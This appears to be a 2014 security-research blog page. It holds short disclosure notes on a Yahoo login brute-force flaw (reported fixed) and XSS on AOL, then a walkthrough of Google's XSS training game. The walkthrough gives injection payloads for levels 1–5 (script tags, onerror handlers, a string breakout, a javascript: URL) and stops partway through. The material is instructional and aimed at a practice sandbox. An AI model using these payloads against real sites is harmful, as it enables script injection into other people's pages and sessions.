Thursday, June 26, 2014

Login Page BruteForcing Vuln On Yahoo - 2nd Yahoo HOF ! Team WHP [POC]

Resercher : Hemanth Joseph

Recently i reported a Login Page BruteForcing Vuln . For which they offered me an HOF . I reported it via HackerOne . This is my 2 nd Yahoo HOF .

The vuln Link was : mail.yahoo.com/m

It allowed bruting passwords with out any captcha protection .

Now they have fixed it .

Thank u for Reading :)

XSS ON AOL.COM - TEAM WHP

Researcher : Rahul Pratap Singh

Team WHP security researcher Rahul Pratap Singh have reported various critical XSS Vulns to AOL . It affects services subdomian of AOL .
POC Will Be released very soon .

Thank You For Reading :)

Saturday, June 7, 2014

Google's New XSS Game : Tricky But Simple [ How to Solve ? ]

Google's New XSS Game : Tricky But Simple [ How to Solve ? ]

Team Google recently released a browser based XSS challenge for security researchers . In this Tutorial we are going to take a look at how to solve this XSS challenge . So here we go

First of all head over to the game area . In my opinion this challenge is pretty simply but some levels are li tricky .

This will be the home page. Click That Green Button To start ;)

Level 1: Hello world of XSS

So as the title of this Level says use the basic XSS payload ie. <script>alert('xss')</script>

Now the Url will be like : https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>

Level 2 : Persistence is the key

Payload : <img src='whp' onerror='alert("xss")'>

Url : https://xss-game.appspot.com/level2/frame
post-content=<img src='whp' onerror='alert("xss")'>

Level 3 : That sinking feeling !

Url : https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level 4 : Context Matters

Payload : ');alert('xss

Url : https://xss-game.appspot.com/level4/frame
timer=');alert('xss

Level 5 : Breaking Protocols

Payload : javascript:alert('xss')

Url : https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')